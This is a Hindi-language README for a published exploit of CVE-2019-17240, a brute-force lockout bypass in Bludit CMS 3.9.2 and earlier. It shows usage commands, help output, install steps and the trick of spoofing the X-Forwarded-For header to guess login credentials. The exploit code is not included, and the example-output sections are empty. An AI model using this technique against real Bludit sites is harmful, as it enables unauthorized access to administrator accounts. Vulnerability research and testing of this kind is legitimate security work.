
Bludit <= 3.9.2 - प्रमाणीकरण ब्रूटफोर्स शमन बाइपास एक्सप्लॉइट/PoC
CVE-2019-17240 के लिए एक्सप्लॉइट कोड, उर्फ ब्लडिट <= 3.9.2 ब्रूटफोर्स शमन बायपास
एक्सप्लॉइट लिंक: [ExploitDB-48942] [PacketStorm]
अपेक्षित परिणाम: Bludit <=3.9.2 चला रहे होस्ट पर ब्रूट-फोर्स तंत्र को बायपास करते हुए लॉगिन क्रेडेंशियल्स का पता लगाना
केवल शैक्षिक और कॉर्पोरेट वातावरण में परीक्षण के लिए अभिप्रेत है।
यह एक्सप्लॉइट Python 3.8.6 पर परीक्षण किया गया था
cfx: ~/bludit
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERLIST] [-p PASSLIST]
Bludit <= 3.9.2 Auth Bruteforce Mitigation Bypass
optional arguments:
-h, --help show this help message and exit
-l URL, --url URL Path to Bludit (Example: http://127.0.0.1/admin/login.php)
-u USERLIST, --userlist USERLIST
Username Dictionary
-p PASSLIST, --passlist PASSLIST
Password Dictionary
Exploit Usage :
./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt
./exploit.py -l http://127.0.0.1/admin/login.php -u /Directory/user.txt -p /Directory/pass.txt
स्थापना:
pip3 install pwn
pip3 install requests
यह एक्सप्लॉइट तीन उपयोगकर्ता इनपुट की अपेक्षा करता है:
एक्सप्लॉइट उपयोग जहां user.txt के अंदर का उपयोगकर्ता नाम pass.txt के अंदर हर पासवर्ड से मैप किया जाता है और लॉगिन पर भेजा जाता है:

मान pass.txt से X-Forwarded-For हेडर में भेजे जाते हैं। यदि सूची में कम संख्या में पासवर्ड हैं, तो संभावना है कि कोई शब्द सर्वर द्वारा ब्लॉक हो जाता है; ऐसे में स्क्रिप्ट आउटपुट में ब्लॉक किया गया शब्द दिखाएगी:

सफल लॉगिन पर, कार्यशील क्रेडेंशियल्स के साथ निम्नलिखित आउटपुट दिखाया जाएगा:

यह Rastating द्वारा Bludit CMS पर पाई गई भेद्यता के लिए एक एक्सप्लॉइट है।
भेद्यता की व्याख्या: https://rastating.github.io/bludit-brute-force-mitigation-bypass/.